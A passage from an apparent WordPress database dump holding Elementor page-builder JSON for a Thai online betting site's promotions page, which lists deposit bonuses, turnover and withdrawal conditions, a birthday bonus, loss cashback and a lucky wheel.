100\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"01efd62\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">\\u0e1d\\u0e32\\u0e01 20 \\u2192 \\u0e23\\u0e31\\u0e1a\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21 80 = \\u0e23\\u0e27\\u0e21 100 \\/ \\u0e17\\u0e33\\u0e40\\u0e17\\u0e34\\u0e23\\u0e4c\\u0e19 8 \\u0e40\\u0e17\\u0e48\\u0e32 \\/ \\u0e16\\u0e2d\\u0e19\\u0e44\\u0e14\\u0e49\\u0e2a\\u0e39\\u0e07\\u0e2a\\u0e38\\u0e14 200<\\/p><p><span style=\\\"text-decoration: underline;\\\"><strong>\\u0e2a\\u0e23\\u0e38\\u0e1b\\u0e40\\u0e07\\u0e37\\u0e48\\u0e2d\\u0e19\\u0e44\\u0e02<\\/strong><\\/span><\\/p><ul><li><strong data-start=\\\"996\\\" data-end=\\\"1012\\\">\\u0e01\\u0e32\\u0e23\\u0e17\\u0e33\\u0e40\\u0e17\\u0e34\\u0e23\\u0e4c\\u0e19<\\/strong>\\u00a08 \\u0e40\\u0e17\\u0e48\\u0e32 \\u0e02\\u0e2d\\u0e07\\u0e22\\u0e2d\\u0e14\\u0e23\\u0e27\\u0e21<\\/li><li>\\u0e40\\u0e09\\u0e1e\\u0e32\\u0e30\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e40\\u0e17\\u0e48\\u0e32\\u0e19\\u0e31\\u0e49\\u0e19<\\/li><li>\\u0e2b\\u0e49\\u0e32\\u0e21\\u0e0b\\u0e37\\u0e49\\u0e2d\\u0e1f\\u0e23\\u0e35\\u0e2a\\u0e1b\\u0e34\\u0e19<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"4f359e1\",\"elType\":\"widget\",\"settings\":{\"text\":\"\\u0e23\\u0e31\\u0e1a\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19 \\u0e04\\u0e25\\u0e34\\u0e01\\u0e40\\u0e25\\u0e22\",\"selected_icon\":{\"value\":\"fas fa-gift\",\"library\":\"fa-solid\"},\"icon_align\":\"row-reverse\",\"icon_indent\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"align\":\"center\",\"text_shadow_text_shadow_type\":\"yes\",\"text_shadow_text_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":50,\"color\":\"rgba(0,0,0,0.3)\"},\"button_box_shadow_box_shadow_type\":\"yes\",\"button_box_shadow_box_shadow\":{\"horizontal\":2,\"vertical\":2,\"blur\":10,\"spread\":0,\"color\":\"rgba(247.980859375, 233.42967273878014, 233.42967273878014, 0.5)\"},\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"e591d78\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#2C2A2AAD\",\"border_border\":\"none\",\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"margin\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true}},\"elements\":[{\"id\":\"d853dea\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e42\\u0e1b\\u0e23 79 \\u0e23\\u0e31\\u0e1a 200\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"2ea7fc2\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">\\u0e1d\\u0e32\\u0e01 79 \\u2192 \\u0e23\\u0e31\\u0e1a\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21 121 = \\u0e23\\u0e27\\u0e21 200 \\/ \\u0e17\\u0e33\\u0e40\\u0e17\\u0e34\\u0e23\\u0e4c\\u0e19 7 \\u0e40\\u0e17\\u0e48\\u0e32 \\/ \\u0e16\\u0e2d\\u0e19\\u0e44\\u0e14\\u0e49\\u0e2a\\u0e39\\u0e07\\u0e2a\\u0e38\\u0e14 600<\\/p><p><span style=\\\"text-decoration: underline;\\\"><strong>\\u0e2a\\u0e23\\u0e38\\u0e1b\\u0e40\\u0e07\\u0e37\\u0e48\\u0e2d\\u0e19\\u0e44\\u0e02<\\/strong><\\/span><\\/p><ul><li data-start=\\\"798\\\" data-end=\\\"837\\\"><strong data-start=\\\"996\\\" data-end=\\\"1012\\\">\\u0e01\\u0e32\\u0e23\\u0e17\\u0e33\\u0e40\\u0e17\\u0e34\\u0e23\\u0e4c\\u0e19<\\/strong>\\u00a07 \\u0e40\\u0e17\\u0e48\\u0e32 \\u0e02\\u0e2d\\u0e07\\u0e22\\u0e2d\\u0e14\\u0e23\\u0e27\\u0e21<\\/li><li data-start=\\\"798\\\" data-end=\\\"837\\\">\\u0e40\\u0e09\\u0e1e\\u0e32\\u0e30\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e40\\u0e17\\u0e48\\u0e32\\u0e19\\u0e31\\u0e49\\u0e19<\\/li><li data-start=\\\"798\\\" data-end=\\\"837\\\">\\u0e2b\\u0e49\\u0e32\\u0e21\\u0e0b\\u0e37\\u0e49\\u0e2d\\u0e1f\\u0e23\\u0e35\\u0e2a\\u0e1b\\u0e34\\u0e19<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"883800f\",\"elType\":\"widget\",\"settings\":{\"text\":\"\\u0e23\\u0e31\\u0e1a\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19 \\u0e04\\u0e25\\u0e34\\u0e01\\u0e40\\u0e25\\u0e22\",\"selected_icon\":{\"value\":\"fas fa-gift\",\"library\":\"fa-solid\"},\"icon_align\":\"row-reverse\",\"icon_indent\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"align\":\"center\",\"text_shadow_text_shadow_type\":\"yes\",\"text_shadow_text_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":50,\"color\":\"rgba(0,0,0,0.3)\"},\"button_box_shadow_box_shadow_type\":\"yes\",\"button_box_shadow_box_shadow\":{\"horizontal\":2,\"vertical\":2,\"blur\":10,\"spread\":0,\"color\":\"rgba(247.980859375, 233.42967273878014, 233.42967273878014, 0.5)\"},\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"49fe62a\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"fc4dc04\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#2C2A2AAD\",\"border_border\":\"none\",\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"margin\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true}},\"elements\":[{\"id\":\"4e0d99f\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e42\\u0e1b\\u0e23\\u0e23\\u0e31\\u0e1a\\u0e42\\u0e21\\u0e1a\\u0e31\\u0e2a 100%\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"20cbe32\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\" data-start=\\\"696\\\" data-end=\\\"740\\\"><strong data-start=\\\"696\\\" data-end=\\\"711\\\">\\u0e04\\u0e38\\u0e49\\u0e21\\u0e2a\\u0e2d\\u0e07\\u0e40\\u0e14\\u0e49\\u0e07<\\/strong> \\u0e40\\u0e15\\u0e34\\u0e21\\u0e40\\u0e17\\u0e48\\u0e32\\u0e44\\u0e23\\u0e23\\u0e31\\u0e1a\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21\\u0e40\\u0e17\\u0e48\\u0e32\\u0e19\\u0e31\\u0e49\\u0e19<\\/p><ul><li data-start=\\\"696\\\" data-end=\\\"740\\\"><strong data-start=\\\"743\\\" data-end=\\\"758\\\">100 \\u0e23\\u0e31\\u0e1a 200<\\/strong><\\/li><li data-start=\\\"696\\\" data-end=\\\"740\\\"><strong data-start=\\\"763\\\" data-end=\\\"780\\\">500 \\u0e23\\u0e31\\u0e1a 1,000<\\/strong><\\/li><\\/ul><p><span style=\\\"text-decoration: underline;\\\"><strong>\\u0e2a\\u0e23\\u0e38\\u0e1b\\u0e40\\u0e07\\u0e37\\u0e48\\u0e2d\\u0e19\\u0e44\\u0e02<\\/strong><\\/span><\\/p><ul><li data-start=\\\"798\\\" data-end=\\\"837\\\"><strong data-start=\\\"798\\\" data-end=\\\"813\\\">\\u0e17\\u0e33 6 \\u0e40\\u0e17\\u0e34\\u0e23\\u0e4c\\u0e19<\\/strong>, <strong data-start=\\\"815\\\" data-end=\\\"835\\\">\\u0e16\\u0e2d\\u0e19\\u0e2a\\u0e39\\u0e07\\u0e2a\\u0e38\\u0e14 3 \\u0e40\\u0e17\\u0e48\\u0e32<\\/strong><\\/li><li data-start=\\\"798\\\" data-end=\\\"837\\\">\\u0e01\\u0e48\\u0e2d\\u0e19\\u0e16\\u0e2d\\u0e19 <strong data-start=\\\"848\\\" data-end=\\\"886\\\">\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e15\\u0e31\\u0e14\\u0e40\\u0e04\\u0e23\\u0e14\\u0e34\\u0e15\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19 (\\u0e2a\\u0e48\\u0e27\\u0e19\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a)<\\/strong> \\u0e2d\\u0e2d\\u0e01\\u0e42\\u0e14\\u0e22\\u0e2d\\u0e31\\u0e15\\u0e42\\u0e19\\u0e21\\u0e31\\u0e15\\u0e34 \\u0e40\\u0e2b\\u0e25\\u0e37\\u0e2d\\u0e22\\u0e2d\\u0e14\\u0e40\\u0e07\\u0e34\\u0e19\\u0e08\\u0e23\\u0e34\\u0e07\\u0e2a\\u0e33\\u0e2b\\u0e23\\u0e31\\u0e1a\\u0e16\\u0e2d\\u0e19<\\/li><li data-start=\\\"798\\\" data-end=\\\"837\\\">\\u0e08\\u0e33\\u0e01\\u0e31\\u0e14\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c <strong data-start=\\\"945\\\" data-end=\\\"967\\\">1 \\u0e04\\u0e23\\u0e31\\u0e49\\u0e07\\/\\u0e27\\u0e31\\u0e19\\/\\u0e1c\\u0e39\\u0e49\\u0e43\\u0e0a\\u0e49<\\/strong><\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"82869dd\",\"elType\":\"widget\",\"settings\":{\"text\":\"\\u0e23\\u0e31\\u0e1a\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19 \\u0e04\\u0e25\\u0e34\\u0e01\\u0e40\\u0e25\\u0e22\",\"selected_icon\":{\"value\":\"fas fa-gift\",\"library\":\"fa-solid\"},\"icon_align\":\"row-reverse\",\"icon_indent\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"align\":\"center\",\"text_shadow_text_shadow_type\":\"yes\",\"text_shadow_text_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":50,\"color\":\"rgba(0,0,0,0.3)\"},\"button_box_shadow_box_shadow_type\":\"yes\",\"button_box_shadow_box_shadow\":{\"horizontal\":2,\"vertical\":2,\"blur\":10,\"spread\":0,\"color\":\"rgba(247.980859375, 233.42967273878014, 233.42967273878014, 0.5)\"},\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"174fb16\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#2C2A2AAD\",\"border_border\":\"none\",\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"margin\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true}},\"elements\":[{\"id\":\"ae3dca7\",\"elType\":\"widget\",\"settings\":{\"title\":\"Happy Birthday Bonus \",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d7acfa\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\" data-start=\\\"1415\\\" data-end=\\\"1466\\\">\\ud83c\\udf81 \\u0e09\\u0e25\\u0e2d\\u0e07\\u0e40\\u0e14\\u0e37\\u0e2d\\u0e19\\u0e40\\u0e01\\u0e34\\u0e14 \\u0e23\\u0e31\\u0e1a\\u0e02\\u0e2d\\u0e07\\u0e02\\u0e27\\u0e31\\u0e0d\\u0e15\\u0e32\\u0e21\\u0e22\\u0e2d\\u0e14\\u0e1d\\u0e32\\u0e01\\u0e2a\\u0e30\\u0e2a\\u0e21\\u0e20\\u0e32\\u0e22\\u0e43\\u0e19\\u0e40\\u0e14\\u0e37\\u0e2d\\u0e19\\u0e19\\u0e31\\u0e49\\u0e19 <br \\/>(\\u0e23\\u0e31\\u0e1a\\u0e44\\u0e14\\u0e49\\u0e15\\u0e25\\u0e2d\\u0e14\\u0e17\\u0e31\\u0e49\\u0e07\\u0e40\\u0e14\\u0e37\\u0e2d\\u0e19\\u0e40\\u0e01\\u0e34\\u0e14)<\\/p><ul><li data-start=\\\"1469\\\" data-end=\\\"1515\\\">\\u0e22\\u0e2d\\u0e14\\u0e1d\\u0e32\\u0e01\\u0e2a\\u0e30\\u0e2a\\u0e21 <strong data-start=\\\"1480\\\" data-end=\\\"1496\\\">3,000 \\u0e02\\u0e36\\u0e49\\u0e19\\u0e44\\u0e1b<\\/strong> \\u2192 <strong data-start=\\\"1499\\\" data-end=\\\"1513\\\">\\u0e23\\u0e31\\u0e1a\\u0e1f\\u0e23\\u0e35 300<\\/strong><\\/li><li data-start=\\\"1469\\\" data-end=\\\"1515\\\">\\u0e22\\u0e2d\\u0e14\\u0e1d\\u0e32\\u0e01\\u0e2a\\u0e30\\u0e2a\\u0e21 <strong data-start=\\\"1529\\\" data-end=\\\"1542\\\">500\\u20132,999<\\/strong> \\u2192 <strong data-start=\\\"1545\\\" data-end=\\\"1555\\\">\\u0e23\\u0e31\\u0e1a 50<\\/strong><\\/li><li data-start=\\\"1469\\\" data-end=\\\"1515\\\">\\u0e22\\u0e2d\\u0e14\\u0e1d\\u0e32\\u0e01\\u0e2a\\u0e30\\u0e2a\\u0e21 <strong data-start=\\\"1571\\\" data-end=\\\"1586\\\">\\u0e44\\u0e21\\u0e48\\u0e40\\u0e01\\u0e34\\u0e19 500<\\/strong> \\u2192 <strong data-start=\\\"1589\\\" data-end=\\\"1616\\\">\\u0e1d\\u0e32\\u0e01\\u0e40\\u0e17\\u0e48\\u0e32\\u0e44\\u0e23 \\u0e23\\u0e31\\u0e1a\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21 100%<\\/strong><\\/li><\\/ul><p data-start=\\\"271\\\" data-end=\\\"387\\\"><span style=\\\"text-decoration: underline;\\\"><strong data-start=\\\"371\\\" data-end=\\\"387\\\">\\u0e2a\\u0e23\\u0e38\\u0e1b\\u0e40\\u0e07\\u0e37\\u0e48\\u0e2d\\u0e19\\u0e44\\u0e02<\\/strong><\\/span><\\/p><ul><li data-start=\\\"1634\\\" data-end=\\\"1680\\\"><strong data-start=\\\"1634\\\" data-end=\\\"1653\\\">\\u0e17\\u0e33\\u0e40\\u0e17\\u0e34\\u0e23\\u0e4c\\u0e19 5 \\u0e40\\u0e17\\u0e48\\u0e32<\\/strong>, <strong data-start=\\\"1655\\\" data-end=\\\"1678\\\">\\u0e16\\u0e2d\\u0e19\\u0e44\\u0e14\\u0e49\\u0e2a\\u0e39\\u0e07\\u0e2a\\u0e38\\u0e14 3 \\u0e40\\u0e17\\u0e48\\u0e32<\\/strong><\\/li><li data-start=\\\"1634\\\" data-end=\\\"1680\\\">\\u0e22\\u0e37\\u0e19\\u0e22\\u0e31\\u0e19\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e42\\u0e14\\u0e22 <strong data-start=\\\"1699\\\" data-end=\\\"1727\\\">\\u0e41\\u0e08\\u0e49\\u0e07\\u0e1a\\u0e31\\u0e15\\u0e23\\u0e1b\\u0e23\\u0e30\\u0e0a\\u0e32\\u0e0a\\u0e19\\u0e01\\u0e31\\u0e1a\\u0e41\\u0e2d\\u0e14\\u0e21\\u0e34\\u0e19<\\/strong><\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"e97b605\",\"elType\":\"widget\",\"settings\":{\"text\":\"\\u0e23\\u0e31\\u0e1a\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19 \\u0e04\\u0e25\\u0e34\\u0e01\\u0e40\\u0e25\\u0e22\",\"selected_icon\":{\"value\":\"fas fa-gift\",\"library\":\"fa-solid\"},\"icon_align\":\"row-reverse\",\"icon_indent\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"align\":\"center\",\"text_shadow_text_shadow_type\":\"yes\",\"text_shadow_text_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":50,\"color\":\"rgba(0,0,0,0.3)\"},\"button_box_shadow_box_shadow_type\":\"yes\",\"button_box_shadow_box_shadow\":{\"horizontal\":2,\"vertical\":2,\"blur\":10,\"spread\":0,\"color\":\"rgba(247.980859375, 233.42967273878014, 233.42967273878014, 0.5)\"},\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9947189\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"b558a2e\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#2C2A2AAD\",\"border_border\":\"none\",\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"margin\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true}},\"elements\":[{\"id\":\"54c71af\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e04\\u0e37\\u0e19\\u0e22\\u0e2d\\u0e14\\u0e40\\u0e2a\\u0e35\\u0e22 10%\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"234d7b8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\" data-start=\\\"1088\\\" data-end=\\\"1118\\\">\\u0e40\\u0e2a\\u0e35\\u0e22\\u0e44\\u0e21\\u0e48\\u0e40\\u0e2a\\u0e35\\u0e22\\u0e40\\u0e1b\\u0e25\\u0e48\\u0e32! \\u0e23\\u0e30\\u0e1a\\u0e1a <strong data-start=\\\"1844\\\" data-end=\\\"1878\\\">\\u0e41\\u0e1b\\u0e25\\u0e07\\u0e22\\u0e2d\\u0e14\\u0e40\\u0e2a\\u0e35\\u0e22\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e41\\u0e15\\u0e49\\u0e21 Reward 10%<\\/strong> <br \\/>\\u0e19\\u0e33\\u0e41\\u0e15\\u0e49\\u0e21\\u0e44\\u0e1b\\u0e25\\u0e38\\u0e49\\u0e19\\u0e43\\u0e2b\\u0e21\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e08\\u0e30\\u0e41\\u0e25\\u0e01\\u0e02\\u0e2d\\u0e07\\u0e23\\u0e32\\u0e07\\u0e27\\u0e31\\u0e25\\u0e01\\u0e47\\u0e44\\u0e14\\u0e49 \\u0e43\\u0e19\\u0e2b\\u0e19\\u0e49\\u0e32\\u0e41\\u0e25\\u0e01\\u0e41\\u0e15\\u0e49\\u0e21<\\/p><p><span style=\\\"text-decoration: underline;\\\"><strong>\\u0e2a\\u0e23\\u0e38\\u0e1b\\u0e40\\u0e07\\u0e37\\u0e48\\u0e2d\\u0e19\\u0e44\\u0e02<\\/strong><\\/span><\\/p><ul><li data-start=\\\"1936\\\" data-end=\\\"1990\\\">\\u0e04\\u0e34\\u0e14\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e40\\u0e1b\\u0e2d\\u0e23\\u0e4c\\u0e40\\u0e0b\\u0e47\\u0e19\\u0e15\\u0e4c\\u0e08\\u0e32\\u0e01\\u0e22\\u0e2d\\u0e14\\u0e40\\u0e2a\\u0e35\\u0e22\\u0e2a\\u0e38\\u0e17\\u0e18\\u0e34 \\u0e15\\u0e32\\u0e21\\u0e23\\u0e2d\\u0e1a\\u0e17\\u0e35\\u0e48\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e01\\u0e33\\u0e2b\\u0e19\\u0e14<\\/li><li data-start=\\\"1936\\\" data-end=\\\"1990\\\">\\u0e41\\u0e15\\u0e49\\u0e21\\u0e44\\u0e21\\u0e48\\u0e43\\u0e0a\\u0e48\\u0e40\\u0e07\\u0e34\\u0e19\\u0e2a\\u0e14\\u0e42\\u0e14\\u0e22\\u0e15\\u0e23\\u0e07 \\u0e15\\u0e49\\u0e2d\\u0e07\\u0e19\\u0e33\\u0e44\\u0e1b\\u0e41\\u0e25\\u0e01\\u0e15\\u0e32\\u0e21\\u0e23\\u0e32\\u0e22\\u0e01\\u0e32\\u0e23\\u0e17\\u0e35\\u0e48\\u0e40\\u0e1b\\u0e34\\u0e14\\u0e43\\u0e2b\\u0e49\\u0e41\\u0e25\\u0e01\\u0e43\\u0e19\\u0e02\\u0e13\\u0e30\\u0e19\\u0e31\\u0e49\\u0e19<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"5ce39e5\",\"elType\":\"widget\",\"settings\":{\"text\":\"\\u0e23\\u0e31\\u0e1a\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19 \\u0e04\\u0e25\\u0e34\\u0e01\\u0e40\\u0e25\\u0e22\",\"selected_icon\":{\"value\":\"fas fa-gift\",\"library\":\"fa-solid\"},\"icon_align\":\"row-reverse\",\"icon_indent\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"align\":\"center\",\"text_shadow_text_shadow_type\":\"yes\",\"text_shadow_text_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":50,\"color\":\"rgba(0,0,0,0.3)\"},\"button_box_shadow_box_shadow_type\":\"yes\",\"button_box_shadow_box_shadow\":{\"horizontal\":2,\"vertical\":2,\"blur\":10,\"spread\":0,\"color\":\"rgba(247.980859375, 233.42967273878014, 233.42967273878014, 0.5)\"},\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"21cd1ab\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#2C2A2AAD\",\"border_border\":\"none\",\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"margin\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true}},\"elements\":[{\"id\":\"6b5fc02\",\"elType\":\"widget\",\"settings\":{\"title\":\"Lucky Wheel \\u0e01\\u0e07\\u0e25\\u0e49\\u0e2d\\u0e40\\u0e2a\\u0e35\\u0e48\\u0e22\\u0e07\\u0e42\\u0e0a\\u0e04 \",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"a328cdd\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\" data-start=\\\"1415\\\" data-end=\\\"1466\\\">\\u0e2b\\u0e21\\u0e38\\u0e19\\u0e25\\u0e38\\u0e49\\u0e19\\u0e23\\u0e32\\u0e07\\u0e27\\u0e31\\u0e25\\u0e17\\u0e38\\u0e01\\u0e27\\u0e31\\u0e19\\u0e14\\u0e49\\u0e27\\u0e22\\u0e41\\u0e15\\u0e49\\u0e21 <strong data-start=\\\"75\\\" data-end=\\\"85\\\">Reward<\\/strong> \\u0e02\\u0e2d\\u0e07\\u0e04\\u0e38\\u0e13 <br \\/>\\u0e40\\u0e1b\\u0e25\\u0e35\\u0e48\\u0e22\\u0e19\\u0e41\\u0e15\\u0e49\\u0e21\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e2b\\u0e21\\u0e38\\u0e19 \\u0e41\\u0e25\\u0e49\\u0e27\\u0e23\\u0e31\\u0e1a\\u0e40\\u0e04\\u0e23\\u0e14\\u0e34\\u0e15\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e17\\u0e31\\u0e19\\u0e17\\u0e35\\u0e2b\\u0e25\\u0e31\\u0e07\\u0e08\\u0e1a\\u0e01\\u0e32\\u0e23\\u0e2b\\u0e21\\u0e38\\u0e19<\\/p><p data-start=\\\"271\\\" data-end=\\\"387\\\"><span style=\\\"text-decoration: underline;\\\"><strong data-start=\\\"371\\\" data-end=\\\"387\\\">\\u0e2a\\u0e23\\u0e38\\u0e1b\\u0e40\\u0e07\\u0e37\\u0e48\\u0e2d\\u0e19\\u0e44\\u0e02<\\/strong><\\/span><\\/p><ul><li data-start=\\\"197\\\" data-end=\\\"252\\\"><strong data-start=\\\"197\\\" data-end=\\\"250\\\">20 \\/ 50 \\/ 100 \\/ 150 \\/ 200 \\/ 250 \\/ 300 \\u0e40\\u0e04\\u0e23\\u0e14\\u0e34\\u0e15\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a<\\/strong><\\/li><li data-start=\\\"197\\\" data-end=\\\"252\\\"><strong data-start=\\\"255\\\" data-end=\\\"275\\\">\\ud83c\\udf81 Mystery Prize<\\/strong>\\u00a0\\u0e2a\\u0e38\\u0e48\\u0e21\\u0e23\\u0e32\\u0e07\\u0e27\\u0e31\\u0e25\\u0e1e\\u0e34\\u0e40\\u0e28\\u0e29 (\\u0e40\\u0e0a\\u0e48\\u0e19 500 \\u0e40\\u0e04\\u0e23\\u0e14\\u0e34\\u0e15 <strong data-start=\\\"310\\\" data-end=\\\"318\\\">\\u0e2b\\u0e23\\u0e37\\u0e2d<\\/strong> \\u0e2a\\u0e1b\\u0e34\\u0e19\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21 +1)<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"5aae432\",\"elType\":\"widget\",\"settings\":{\"text\":\"\\u0e23\\u0e31\\u0e1a\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19 \\u0e04\\u0e25\\u0e34\\u0e01\\u0e40\\u0e25\\u0e22\",\"selected_icon\":{\"value\":\"fas fa-gift\",\"library\":\"fa-solid\"},\"icon_align\":\"row-reverse\",\"icon_indent\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"align\":\"center\",\"text_shadow_text_shadow_type\":\"yes\",\"text_shadow_text_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":50,\"color\":\"rgba(0,0,0,0.3)\"},\"button_box_shadow_box_shadow_type\":\"yes\",\"button_box_shadow_box_shadow\":{\"horizontal\":2,\"vertical\":2,\"blur\":10,\"spread\":0,\"color\":\"rgba(247.980859375, 233.42967273878014, 233.42967273878014, 0.5)\"},\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false}]'),(507,84,'_elementor_edit_mode','builder'),(508,84,'_elementor_template_type','wp-page'),(509,84,'_elementor_version','3.32.5'),(510,84,'_elementor_pro_version','3.32.3'),(511,84,'_wp_page_template','default'),(512,84,'_elementor_page_settings','a:1:{s:10:\"hide_title\";s:3:\"yes\";}'),(513,84,'_elementor_data','[{\"id\":\"d070aea\",\"elType\":\"section\",\"settings\":{\"margin\":{\"unit\":\"px\",\"top\":\"10\",\"right\":0,\"bottom\":\"10\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"4d6b9b4\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"db612d4\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19 Megabet333 